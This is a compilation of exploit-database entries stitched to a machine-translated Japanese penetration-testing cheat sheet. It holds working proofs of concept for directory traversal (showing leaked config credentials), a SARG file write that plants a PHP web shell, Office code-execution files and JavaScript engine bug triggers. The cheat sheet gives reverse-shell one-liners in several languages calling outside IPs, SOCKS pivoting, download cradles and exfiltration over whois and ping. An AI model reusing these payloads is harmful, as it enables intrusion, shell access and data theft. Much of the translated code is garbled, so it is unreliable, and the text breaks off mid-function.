6. RISK
=======
To successfully exploit this vulnerability a user with rights to access the
compliance reports must be tricked into visiting an arbitrary website while
having an authenticated session in the application.
The vulnerability allows remote attackers to trigger a report generation and
send the report out to an arbitrary email address, which may lead to the
disclosure of very sensitive internal reporting information stored in AlienVault
USM through pre-defined reports such as:
- Alarms
- Assets Inventory
- Compliance Reports such as PCI DSS and HIPAA
- Raw Logs
- Security Events
- Security Operations
- Tickets
- User Activity
7. SOLUTION
===========
None.
8. REPORT TIMELINE
==================
2017-09-22: Discovery of the vulnerability
2017-09-22: Sent full vulnerability details to publicly listed security email
address
2016-10-01: MITRE assigns CVE-2017-14956
2017-10-03: No response from vendor, notified vendor again
2017-10-13: No response from vendor
2017-10-13: Public disclosure according to disclosure policy
9. REFERENCES
=============
https://www.rcesecurity.com/2017/10/cve-2017-14956-alienvault-usm-leaks-sensitive-compliance-information-via-csrf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14956
Title:
======
3CX Phone System - Authenticated Directory Traversal
Author:
=======
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
CVE-ID:
=======
CVE-2017-15359
Risk Information:
=================
CVSS Base Score: 6.8
CVSS Vector: CVSS3#AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
Timeline:
=========
2017-08-08 Vulnerability discovered
2017-08-10 Asked for security contact
2017-08-11 Send details to the vendor
2017-09-04 Vendor has confirmed the vulnerability, will be fixed in the next release
2017-10-16 Public disclosure
Affected Products:
==================
3CX Phone System 15.5.3554.1 (Debian based installation)
Vendor Homepage:
================
https://www.3cx.com/phone-system/download-links/
Details:
========
In the 3CX Phone System 15.5.3554.1, the Management Console typically listens to port 5001 and is prone to a directory traversal attack:
"/api/RecordingList/DownloadRecord?file=" and "/api/SupportInfo?file=" are the vulnerable parameters. An attacker must be authenticated to exploit
this issue to access sensitive information to aid in subsequent attacks.
The vulnerabilities were found during a penetration test.
Proof of Concept:
=================
~$ curl -i -k --cookie ".AspNetCore.Cookies=CfDJ8PTIw(...)" https://192.168.0.1:5001/api/SupportInfo?file=/var/lib/3cxpbx/Instance1/Bin/3CXPhoneSystem.ini
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Aug 2017 13:05:16 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-3CX-Version: 15.5.3554.1
Content-Disposition: attachment; filename="/var/lib/3cxpbx/Instance1/Bin/3CXPhoneSystem.ini"; filename*=UTF-8''%2Fvar%2Flib%2F3cxpbx%2FInstance1%2FBin%2F3CXPhoneSystem.ini
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15768000
[General]
;connection point to call manager
;used by:
;a) call manager initializes own listener before it connects to configuration server.
;b) components which are working directly with call manager
;MUST NOT be used by components which make connection to configuration server.
;They MUST use CM_API_IP, CM_API_PORT, CM_API_USER and CM_API_PASSWORD paramaeters to make direct connection to CallManagerAPI
pbxSLNIC=127.0.0.1
cmPort=5482
pbxuser=instance_Instance158792
pbxpass=REMOVED
AppPath=/var/lib/3cxpbx/Instance1
AppDataPath=/var/lib/3cxpbx/Instance1
Tenant=Instance1
[ConfService]
;connection point to configuration server for components
confNIC=127.0.0.1
ConfPort=5485
confUser=cfguser_default
confPass=REMOVED
[CfgServerProfile]
;configuration server connection to database
;exclusively used by configuration server
DBHost=127.0.0.1
DBPort=5432
MasterDBUser=phonesystem
MasterDBPassword=REMOVED
MasterTable=phonesystem_mastertable
DefFile=Objects.cls
[QMDatabase]
DBHost=127.0.0.1
DBPort=5432
DBName=database_single
dbUser=logsreader_single
dbPassword=REMOVED
[MIME_TYPES]
MESSAGE=x-chat/control
Fix:
====
Vendor has confirmed the vulnerability, will be fixed in the next release.
# Exploit Title: RCE/Arbitrary file write in Squid Analysis Report Generator (SARG)
# Google Dork: inurl:sarg-php
# Date: 01 September 2017
# Exploit Author: Pavel Suprunyuk
# Vendor Homepage: https://sourceforge.net/projects/sarg/
# Software Link: https://sourceforge.net/projects/sarg/
# Version: Tested on 2.3.10, other versions are vulnerable too.
# Tested on: PHP, any OS
# CVE : None
===================================
sarg-php/sarg-squidguard-block2.php does not require any authentication and allows to write an arbitrary file:
sarg-php/sarg-squidguard-block2.php?file=<your_shell_name.php>&url=<your_php_shell_content>
Exploit example:
the following request
http://vulnerable_site/sarg-php/sarg-squidguard-block2?file=shell.php&url=%3C%3Fphp%20if%20(isset($_GET%5B'cmd'%5D))%20echo%20shell_exec($_GET%5B'cmd'%5D)%3B%20%3F%3E
will write the basic shell "<?php if (isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>" into the "shell.php" file
Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability
Date: September 28th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Groove contains a security bypass issue regarding 'Workspace Shortcut' files (.GLK)
because it allows arbitrary (registered) URL Protocols to be passed, when only 'grooveTelespace://' URLs
should be allowed, which allows execution of arbitrary code upon opening a 'GLK' file.
Usually, URLs are passed to web browsers, but because it uses 'ShellExecute()', if malicious users pass
a 'file:///' URL, it will launch the default application for the file type specified in the URL. Important:
the 'GLK' extension is not in any of the Microsoft black list (eg. Outlook, IE) so we assume it´s a 'safe' file type. 2 proof of
concepts are provided, one for simply launching 'cmd.exe', and another, remote, that works on any Windows version:
-----poc_cmd_x64.GLK--------------------------------------------------------------------------------
<?xml version='1.0'?><?groove.net version='1.0'?><ns1:ExplorerLink xmlns:ns1="urn:groove.net">
<ns1:NavigationInfo URL="file:///C:\windows\syswow64\cmd.exe"/>
</ns1:ExplorerLink>
----------------------------------------------------------------------------------------------------
-----poc_cmd_x86.GLK--------------------------------------------------------------------------------
<?xml version='1.0'?><?groove.net version='1.0'?><ns1:ExplorerLink xmlns:ns1="urn:groove.net">
<ns1:NavigationInfo URL="file:///C:\windows\system32\cmd.exe"/>
</ns1:ExplorerLink>
----------------------------------------------------------------------------------------------------
-----poc_CPL.GLK------------------------------------------------------------------------------------
<?xml version='1.0'?><?groove.net version='1.0'?><ns1:ExplorerLink xmlns:ns1="urn:groove.net">
<ns1:NavigationInfo URL="file:///\\192.168.0.50\share\CPL_Shortcut.lnk"/>
</ns1:ExplorerLink>
----------------------------------------------------------------------------------------------------
* the 'CPL_Shortcut.lnk' is a special type of shortcut, which doesn´t trigger warnings upon opening,
that can be easily created by dragging a
Windows Control Panel item icon from the Control Panel folder to the Desktop. Notice the item must be
a CPL file, not a special folder (some control panel items are just special types of folder not the
classic CPL file.
The easiest way to do it is:
a) Grab a Windows XP machine (there are lots of Control Panel items that are CPL files)
b) Drag and drop an icon, eg. the 'User Accounts' icon to the Desktop.
c) Open the shortcut file created in the Desktop with an Hex Editor (you may need to rename the file,
removing the '.lnk' extension or some programs will load the target of the shortcut instead of the shortcut
file itself). Edit the portion (in 'Unicode' format) that points to :
c:\windows\system32\nusrmgr.cpl and write an UNC path pointing to a valid CPL file:
\\192.168.0.50\share\cpl_sh.cpl (don´t forget the maximum path length (32 chars) must NOT be exceeded.)
d) Save the file and rename it to "CPL_Shortcut.lnk" and finally place it in the appropriate folder,
which will be accessed from remote, via: \\192.168.0.50\share
e) Using MS Visual Studio (tested with a C++ DLL compiled with VS 2008),
compile a DLL with code of choice and a 'DllMain' function and name it "cpl_sh.cpl".
f) Make sure the share and the 2 files (the .CPL and .LNK) are anonymously accessible from a remote
machine.
That´s it, now just open the 'GLK' files. Both 'cmd.exe' and the CPL file should be executed/loaded.
Notice the files located in the remote share will take longer than 'CMD.exe' to be executed for obvious
reasons, just wait a few seconds.
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it´s possible to exploit it through Excel too, however the target would need to either accept a security warning
regarding external links or double click inside the Excel window, same applies for Powerpoint, so I guess this is the reason, Word caught
the attention and no exploit PoC was made available to other Office apps.
This vulnerability exists in the way Excel handles parameters passed to the "DDEService" attribute of links, leading to the search for a
program to display it. As it does not impose restrictions on what program is going to be executed, for instance, only programs located in the
Office install directory, it is possible to invoke arbitrary local programs with parameters, leading to system compromise.
Since Excel blocks automatic update of linked files, the target must be tricked into double clicking anywhere inside the document.
(The linked object occupies basicly the whole document window). Without the patch applied no warning/prompt is shown;
With the patch a prompt is shown asking if it´s ok to run 'xxxx.exe', where 'xxxx.exe' can have arbitrary names as long as it´s at most 8
chars long, so we could still fake/spoof it as another Office app (the app name cannot be the same of the legitimate, eg. 'Excel').
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42995.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
The exploit achieves R/W access to the host's physical memory.
This exploit has been tested on the iPhone 7, iOS 10.2 (14C92). To run the exploit against different devices or versions, the symbols must be adjusted.
The attached archive contains the following directories:
-hostapd-2.6 - A modified version of hostapd utilised in the exploit. This version of hostapd is configured to
support 802.11k RRM, and in particular Neighbor Reports. Moreover, this version of hostapd is
instrumented to add various commands, allowing injection and reception of crafted action frames
used throughout the exploit.
-OneRing - The exploit itself.
To run the exploit, you must execute the following steps:
-Connect (and enable) a SoftMAC Wi-Fi dongle to your machine (such as the TL-WN722N)
-Compile the provided version of hostapd
-Modify the "interface" setting under "hostapd-2.6/hostapd/hostapd.conf" to match your interface's name
-Configure the following settings under "OneRing/rrm_exploit/conf.py":
-HOSTAPD_DIR - The directory of the hostapd binary compiled above
-TARGET_MAC - The MAC address of the device being exploited
-AP_MAC - The MAC address of your wireless dongle
-INTERFACE - The name of the wireless dongle's interface
-Configure the following settings under "OneRing/conf.py":
-TARGET_MAC - The MAC address of the device being exploited
-TARGET_IP - The IP address of the device being exploited
-Assemble the backdoor shellcode by running "OneRing/rrm_exploit/assemble_backdoor.sh"
-Assemble each of the code chunks under "OneRing/code_chunks" by running "compile.sh"
-Run hostapd with the configuration file provided above, broadcasting a Wi-Fi network ("test80211k")
-Connect the target device to the network
-Run "OneRing/attack.py"
Following the steps above should result in DART's descriptor being mapped into IO-Space, allowing R/W access to the host's physical memory. You can utilise this R/W access by calling the "read_host_dword" and "write_host_dword" functions, respectively.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42996.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
Windows: WLDP/MSHTML CLSID UMCI Bypass
Platform: Windows 10 S (thought should be anything with UMCI)
Class: Security Feature Bypass
Summary:
The enlightened lockdown policy check for COM Class instantiation can be bypassed in MSHTML hosts leading to arbitrary code execution on a system with UMCI enabled (e.g. Device Guard)
Description:
Scripting hosts are supposed to check against the Windows Lockdown Policy (WLDP) before instantiating arbitrary COM classes. This is typically done by calling WldpIsClassInApprovedList from WLDP.DLL before instantiating any COM class. For example in the case of JScript’s ActiveXObject the ProgID is passed to CLSIDFromProgID by the script host and the resulting CLSID is passed to WLDP to determine what’s allowed.
It’s possible to circumvent this check by using the COM TreatAs key to redirect one of the limited (8) allowed CLSIDs to an arbitrary class and get it instantiated. However you can’t do this using ActiveXObject as CLSIDFromProgID will return the resulting CLSID from looking up TreatAs. That said there is a race condition here. However in an MSHTML Local Machine Zone scenario you can bypass it by using an OBJECT tag. In this case MSHTML parses the classid attribute and checks that CLSID against WLDP. It then proceeds to create it using CoCreateInstance which follows TreatAs and creates a different object.
This does require modification of the registry to work, but I think that’s in scope. The reason I’m reporting this one is I think it’s a bug in MSHTML, rather than in an application you can easily block (at least if you want to disable
Proof of Concept:
I’ve provided a PoC is two files, a text file to set-up the registry and a HTML file. The registry file is in the REGINI format which allows it to work on Win10S as while reg.exe and regedit.exe are blocked regini.exe isn’t. The HTML file can be run inside IE or my prefered option HTML Help. You could even make the PoC file a CHM but I didn’t. The PoC can bootstrap things like untrusted .NET but for simplicity it doesn’t.
1) Unpack the PoC and ensure the HTML file does NOT have MOTW.
2) From the explorer Run dialog execute “regini path\to\keys.txt”
3) Execute the HTML file from the Run dialog using “hh path\to\shell.html”
Expected Result:
The class creation should fail.
Observed Result:
The class creation succeeded and the HTML file executed notepad.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42997.zip
情報収集
オープンソースインテリジェンス情報コレクション(OSINT)
github
github_nuggests(githubに漏れた敏感な情報を自動的にクロールする):https://github.com/az0ne/github_nuggests
GSIL(15分以内に)ほぼリアルタイムでGitHubでリークされた情報を発見することができます:https://GITHUB.COM/FEEICN/GSIL
X-Patrol(Xiaomiチームの):3359GITHUB.com/misecurity/x-patrol
whois query/register counter-ceck/emailカウンターチェック/関連資産
Webmaster's Home :http://whois.chinaz.com/?domainname=target.comws=
ラブステーション:https://whois.aizhan.com/target.com/
Weibu Online :https://X.Threatbook.cn/
IP Counter-Check:https://dns.aizhan.com/
Tianyancha :https://www.tianyancha.com/
Tiger Mom Check :http://ww.whomx.com/
歴史的脆弱性クエリ:オンラインクエリ:http://wy.zone.ci/
自己構築:https://github.com/hanc00l/wooyun_publi/
Googleハッキング
エンタープライズパスワード辞書を作成
辞書リスト
PasswordList:3359Github.com/lavalamp-/password-lists
Pigman Dictionary :https://pan.baidu.com/s/1dfjyedzblasting_dictionary(弱いパスワード、一般的に使用されるパスワード、ディレクトリブラスト、データベースブラスト、編集者ブラスト、背景爆破などを含むさまざまな辞書を共有および収集します。
特定のメーカーの場合、メーカー関連のドメイン名の辞書の構築に焦点を当てています
['%PWD%123'、 '%user%123'、 '%user%521'、 '%user%2017'、 '%pwd%321'、 '%pwd%521'、 '%user%321'、 '%pwd%123!'、 '%pwd%1 23!@# '、'%PWD%1234 '、'%user%2016 '、'%user%123 $%^'、'%user%123!@# '、'%pwd%2016 '、'%pwd%2017 '、'%pwd%1! '、'%pwd%2 @'、'%PWD%3# '、'%PWD%123#@! '、'%PWD%12345 '、'%PWD%123 $%^'、'%PWD% 56 '、'%user%123#@! '、'%user%
パスワード生成
GenPass(漢字を備えた弱いパスワードジェネレーター:33https://GITHUB.COM/RICTERZ/GENPASS/
Passmaker(ルールをカスタマイズできるパスワード辞書ジェネレーター):https://github.com/bit4woo/passmaker
pydictor(強力なパスワードジェネレーター):https://github.com/landgrey/pydictor
メーリングリストGet
TheHarvester:https://github.com/laramies/theharvester
メールアドレスを取得し、アドレス帳をエクスポートします
LinkedInt :https://github.com/mdsecactivebreach/linkedint
Mailet:https://github.com/ridter/mailget
リークパスワードクエリ
ghostproject:3359ghostproject.fr/
pwndb:https://pwndb2am4tzkvold.onion.to/
エンタープライズ外の関連情報のコレクション
サブドメイン名取得
レイヤーサブドメイン掘削機4.2記念バージョン
subdomainsbrute:https://github.com/lijiejie/subdomainsbrute
wydomain:https://github.com/ring04h/wydomain
sublist3r:https://github.com/aboul3la/sublist3r
site:target.com:https://www.google.com
GitHubコードリポジトリ
パケットキャプチャ分析リクエストリクターズ返品値(ジャンプ/ファイルアップロード/APP/APIインターフェイスなど)
Webmasterヘルパーリンクおよびその他のオンライン検索Webサイト
ドメイン送信の脆弱性
Linux
dig @ns.example.com example=.com axfr
Windows
nslookup -type=ns xxx.yyy.cn #queryドメイン名を解決するDNSサーバー
nslookup #enter nslookupインタラクティブモード
サーバーdns.domian.com #pecify dns server
LS XXX.YYY.CN #LISTドメイン情報
getDomainsByssl.py :3359Note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b1222222222222222222222222222222222222222222222222222222
censys.io証明書:https://censys.io/certificates?q=target.com
CRT.SH証明書クエリ3:3359CRT.SH/?Q=%25.Target.com
Shadon :https://www.shodan.io/
Zoomeye :https://www.zoomeyee.org/
FOFA :https://FOFA.SO/
Censys:https://Censys.io/
dnsdb.io :3359dnsdb.io/zh-cn/search?q=target.com
api.hackertarget.com :3358api.hackertarget.com/reversedns/?q=target.com
community.riskiq.com :3359Community.riskiq.com/search/target.com
subdomain3 :https://github.com/yanxiu0614/subdomain3
Fuzzdomain :https://github.com/chora10/fuzzdomain
dnsdumpster.com :3359dnsdumpster.com/
phpinfo.me :3359phpinfo.me/domain/
DNS Open Data Interface :https://DNS.BUFFEROVER.RUN/DNS?Q=BAIDU.com
イントラネット
を入力しますエンタープライズの弱いアカウントの抜け穴に基づいて
VPN(電子メール、パスワードブラスト、ソーシャルワーカーなどを介してVPNを取得)
エンタープライズ関連の運用およびメンテナンスシステム(Zabbixなど)
システムの脆弱性に基づいて入力
Metasploit(脆弱性エクスプロイトフレームワーク):3359Github.com/rapid7/Metasploit-framework
スクリプトを悪用します
ウェブサイトのアプリケーションの普及
SQL注入
クロスサイトスクリプト(XSS)
クロスサイトリクエスト偽造(CSRF)
ssrf(ssrf_proxy)
機能/ビジネスロジックの脆弱性
その他の脆弱性など
CMSコンテンツ管理システムの脆弱性
エンタープライズセルフビルドエージェント
ワイヤレスWi-Fiアクセス
シーン攻撃
コマンドとコントロール
ICMP :3359Pentestlab.blog/2017/07/28/Command-and-Control-icmp/
DNS :https://Pentestlab.blog/2017/09/06/command-and-control-dns/
Dropbox :https://Pentestlab.blog/2017/08/29/command-and-control-dropbox/
gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/
Telegram :http://drops.xmd5.com/static/drops/tips-16142.html
Twitter :https://Pentestlab.blog/2017/09/26/command-and-control-twitter/
ウェブサイトキーワード:https://Pentestlab.blog/2017/09/14/command-and-control-website-keyword/
Powershell :https://Pentestlab.blog/2017/08/19/command-and-control-powershell/
Windows com :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/
webdav :https://pentestlab.blog/2017/09/12/command-and-control-webdav/
Office 365 :https://www.anquanke.com/post/id/86974
https :https://pentestlab.blog/2017/10/04/command-and-control-https/
Kernel :https://Pentestlab.blog/2017/10/02/command-and-control-kernel/
ウェブサイト:https://Pentestlab.blog/2017/11/14/command-and-control-website/
WMI :https://Pentestlab.blog/2017/11/20/command-and-control-wmi/
WebSocket :https://Pentestlab.blog/2017/12/06/command-and-control-websocket/
画像:https://Pentestlab.blog/2018/01/02/command-and-control-images/
Webインターフェイス:https://Pentestlab.blog/2018/01/03/command-and-control-web-interface/
JavaScript :https://Pentestlab.blog/2018/01/08/command-and-control-javascript/
.
フロンティング
ドメインフロンティング
tor_fronting。
エージェント
VPN
http :http://cn-proxy.com/
トル
インターネットクロスボーダーアプリケーション
イントラネットクロスボーダー転送
NCポート転送
LCXポート転送
NP
プロキシスクリプトTunna
reduh
.
イントラネットクロスボーダープロキシ浸透
ew
フォワードソックスV5サーバー:
./ew -s ssocksd -l 1080
リバウンドソックスV5サーバー:A)最初に、パブリックネットワークIPを使用してホストAで次のコマンドを実行します。
$ ./ew -s rcsocks -l 1080 -e 8888
b)ターゲットホストBで靴下V5サービスを開始し、パブリックホストのポート8888にバウンスします
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
マルチレベルのカスケード
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
LCX_TRANの使用
$ ./EW -S SSOCKSD -L 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
LCX_LISTENとLCX_SLAVEの使用
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./EW -S SSOCKSD -L 9999
$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999
参照のために「3レベルのカスケード」ローカルソックステストケース
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
シロアリ
use :3https://rootkiter.com/termite/readme.txtの手順
プロキシスクリプト
Regeorg :3359github.com/sensepost/regeorg
シェルリバウンド
bash
bash -i /dev/tcp/10.0.0.1/8080 01
Perl
perl -e '使用socket; $ i='10 .0.0.1 '; $ p=1234; socket(s、pf_inet、sock_stream、getprotobyname(' tcp ')); if(connect(s、 sockaddr_in($ p、inet_aton($ i)))){open(stdin、 's'); open(stdout、 's'); open(stderr、 's'); exec( '/bin/sh -私');};'
Python
python -c 'インポートソケット、サブプロセス、OS; s=socket.socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '10.0.0.1'、1234)); o s.dup2(s.fileno()、0); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); p=subprocess.call(['/bin/sh' '、' -i '];'
Php
php -r '$ sock=fsocopen('10 .0.0.1'、1234); exec( '/bin/sh -i 3 3 23'); '
ルビー
ruby -rsocket -e'f=tcpsocket.open('10 .0.0.1 '、1234).to_i; exec sprintf('/bin/sh -i%d%d 2%d '、f、f、f)'
Java
r=runtime.getRuntime()
p=r.exec(['/bin/bash'、 '-c'、 'exec 5/dev/tcp/10.0.0.1/2002; cat 5 | while read line; do \ $ line 25 5; done'] string []))
p.waitfor()
NC
#use-e
NC -E /BIN /SH 223.8.200.234 1234
#not used-e
mknod /tmp /backpipe p
/bin/sh 0/tmp/backpipe | NC AttacherIPリスニングポート1/TMP/バックパイプ
ルア
lua -e 'require(' socket '); require(' os '); t=socket.tcp(); t:connect(' 202.103.243.122 '、' 1234 '); os.execute('/bin/sh -i 3 3 23 ');'
イントラネットファイルの転送およびダウンロード
WPUT
wput dir_name ftp://linuxpig:123456@host.com/
wget
wget http://site.com/1.rar -o 1.rar
ARIAC2(インストールする必要があります)
aria2c -o owncloud.zip 3https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
Powershell
$ p=new-Object System.net.webclient
$ P.DownLoadFile( 'http://Domain/file'、 'c:%homepath%file')
VBSスクリプト
args=wscript.argumentsを設定します
url='http://domain/file'
dim xhttp: set xhttp=createObject( 'microsoft.xmlhttp')
dim bstrm: set bstrm=createObject( 'adodb.stream')
xhttp.open 'get'、url、false
xhttp.send
BSTRMで
.type=1 '。開ける。xhttp.responsebodyを作成します
.savetofile 'c: \%homepath%\ file'、2 '
で終わります
実行:cscript test.vbs
Perl
#!/usr/bin/perl
lwp:simpleを使用します。
getStore( 'http://domain/file'、 'file');
実行:perl test.pl
Python
#!/usr/bin/python
urllib2をインポートします
u=urllib2.urlopen( 'http://domain/file')
localfile=open( 'local_file'、 'w')
localfile.write(u.read())
localfile.close()
実行:python test.py
ルビー
#!/usr/bin/ruby
「net/http」が必要です
net:http.start( 'www.domain.com'){| http |
r=http.get( '/file')
open( 'Save_Location'、 'wb'){| file |
file.write(r.body)
}
}
実行:Ruby test.rb
Php
?php
$ url='http://ww.example.com/file';
$ path='/path/to/file';
$ ch=curl_init($ url);
curl_setopt($ ch、curlopt_returntransfer、true);
$ data=curl_exec($ ch);
curl_close($ ch);
file_put_contents($ path、$ data);
?
実行:php test.php
ncattacker
CATファイル| NC -L 1234
ターゲット
NC HOST_IP 1234ファイル
FTP
FTP 127.0.0.1ユーザー名パスワードファイル終了を取得します
TFTP
TFTP -IホストGET C:%HOMEPATH%FILE LOCATION_OF_FILE_ON_TFTP_SERVER
bitsadmin
bitsadmin /転送n http://domain /file c:%homepath%file
ウィンドウファイル共有
正味使用x: \ 127.0.0.1 \ share /user:example.comuserid mypassword
SCPローカルからリモート
SCPファイルuser@host.com:/TMP
リモートからローカル
scp user@host.com:/TMPファイル
rsyncリモートrsyncサーバーからローカルマシンにファイルをコピーする
rsync -av root@192.168.78.192:3360ww /databack
ローカルマシンからリモートRSYNCサーバーにファイルをコピーする
rsync -av /databack root@192.168.78.192:3360www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
コピー
コピー\\ ip \ sharename \ file.exe file.exe
WHOISレシーバーホストB:
NC -VLNP 1337 | SED 's///g' | base64 -d
送信者ホストA:
whois -h host_ip -p 1337 `cat /etc /passwd | base64`
WHOIS + TARFIRST:
ncat -k -l -p 4444 |ティーファイル。b64#teeファイルに、それが確実に持っていることを確認できるようにする
次
TAR CZF - /TMP /* | base64 | xargs -iビットタイムアウト0.03 whois -h host_ip -p 4444ビット
ついに
cat files.b64 | tr -d '\ r \ n' | base64 -d | tar zxv#ファイルを出力します
Ping送信終了:
xxd -p -c 4 Secret.txt |読み取りライン。 ping -c 1 -p $ line ipを行います。終わり
受信者ping_receiver.py:
sysをインポートします
try:
scapy.allからimport *
:を除く
印刷( 'SCAPYが見つかりません、SCAPY: PIPインストールSCAPY'をインストールしてください ')
sys.exit(0)
def process_packet(pkt):
pkt.haslayer(ICMP):の場合
pkt [icmp] .type==8:の場合
data=pkt [icmp] .load [-4:]
print(f '{data.decode(' utf-8 ')}'、flush=true、end=''、sep='')
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1338
Here's a snippet of the method that interprets a javascript function's bytecode.
Js::Var Js::InterpreterStackFrame::INTERPRETERLOOPNAME()
{
PROBE_STACK(scriptContext, Js::Constants::MinStackInterpreter); <<----- (a)
if (!this->closureInitDone)
{
Assert(this->m_reader.GetCurrentOffset() == 0);
this->InitializeClosures(); <<------- (b)
}
...
... interprets the bytecode
...
At (b), it initializes the local variables of the javascript function. In the PoC, the variables a, b and c are initialized.
But at (a), if it fails to allocate Js::Constants::MinStackInterpreter bytes to the stack, it throws an exception which leads to the following code.
void StackScriptFunction::BoxState::Box()
{
...
if (callerFunctionBody->DoStackScopeSlots())
{
Var* stackScopeSlots = (Var*)interpreterFrame->GetLocalClosure();
if (stackScopeSlots)
{
Var* boxedScopeSlots = this->BoxScopeSlots(stackScopeSlots, ScopeSlots(stackScopeSlots).GetCount());
interpreterFrame->SetLocalClosure((Var)boxedScopeSlots);
}
...
...
"stackScopeSlots" contains the local variables that were supposed to be initialized at (b). So it results in accessing the uninitialized pointers.
It's a little difficult to trigger this in Edge. So I recommend to use the command: ./Debug/ch -NoNative ~/test.js.
PoC:
*/
function trigger() {
let a, b, c;
function g() {
trigger();
a, b, c;
}
g();
}
trigger();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1333
Bailout:
"ChakraCore’s background JIT compiler generates highly optimized JIT’ed code based upon the data and infers likely usage patterns based on the profile data collected by the interpreter. Given the dynamic nature of JavaScript code, if the code gets executed in a way that breaks the profile assumptions, the JIT’ed code “bails out” to the interpreter where the slower bytecode execution restarts while continuing to collect more profile data."
From https://github.com/Microsoft/ChakraCore/wiki/Architecture-Overview
One of the ways to generate bailouts in Chakra is to directly change the opcode of an instruction that can't be JITed. This is performed by the method "Lowerer::GenerateBailOut".
Here's a snippet of Lowerer::GenerateBailOut.
...
// Call the bail out wrapper
instr->m_opcode = Js::OpCode::Call;
if(instr->GetDst())
{
// To facilitate register allocation, don't assign a destination. The result will anyway go into the return register,
// but the register allocator does not need to kill that register for the call.
instr->FreeDst();
}
instr->SetSrc1(IR::HelperCallOpnd::New(helperMethod, this->m_func));
m_lowererMD.LowerCall(instr, 0);
Here's some calling patterns of the method.
1.
instr->FreeSrc1();
instr->FreeSrc2();
this->GenerateBailOut(instr);
2.
stElem->FreeSrc1();
stElem->FreeDst();
GenerateBailOut(stElem, nullptr, nullptr);
Judging from the method code that doesn't care about "Src2" and the calling patterns, freeing or unlinking "Src1" and "Src2" is up to the callers. I could spot some points that don't free or unlink an instuction's "Src2", despite the instruction has "Src2". In these cases, it ends up to be converted to "Js::OpCode::Call" with "Src2". So, what happens if a Call instruction has "Src2"?
Here's the trace log of the PoC.
$L13: [helper]
s51<-48> = MOV s51(r13) 4C 89 6D D0
(rdi).u64 = MOV 0xXXXXXXXX (BailOutRecord).u64 48 BF 78 23 00 7C 17 7F 00 00
(rax).u64 = MOV SaveAllRegistersAndBailOut.u64 48 B8 20 92 19 93 1F 7F 00 00
CALL (rax).u64, s51(r13) 49 FF C5
JMP $L14 E9 00 00 00 00
StatementBoundary #-1
"CALL (rax).u64, s51(r13)" is what Chakra wanted to generate(despite CALLs don't take the second operand). "49 FF C5" is x86-64 code actually generated and disassembled as "inc r13". This also means there's a bug in the x86-64 assembler.
PoC bug:
The following buggy method is used to convert a St*Fld instruction to a bailout. Unlike just "StFld" instructions, "StSuperFld" instructions take "Src2" as "this". So the following method should have freed "Src2".
bool
Lowerer::GenerateStFldWithCachedType(IR::Instr *instrStFld, bool* continueAsHelperOut, IR::LabelInstr** labelHelperOut, IR::RegOpnd** typeOpndOut)
{
...
instrStFld->m_opcode = Js::OpCode::BailOut;
instrStFld->FreeSrc1();
<<----------- should call FreeSrc2
instrStFld->FreeDst();
this->GenerateBailOut(instrStFld);
...
}
PoC:
*/
class MyClass {
constructor() {
this.arr = [1, 2, 3];
}
f() {
super.arr = [1];
this.x; // for passing BackwardPass::DeadStoreTypeCheckBailOut ?
}
}
let c = new MyClass();
for (let i = 0; i < 0x10000; i++) {
c.f();
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1334
The "String.prototype.replace" method can be inlined in the JIT process. So in the method, all the calls which may break the JIT assumptions must be invoked with updating "ImplicitCallFlags". But "RegexHelper::StringReplace" calls the replace function without updating the flag. Therefore it fails to detect if a user function was called.
The PoC shows that it can result in type confusion.
PoC:
*/
function main() {
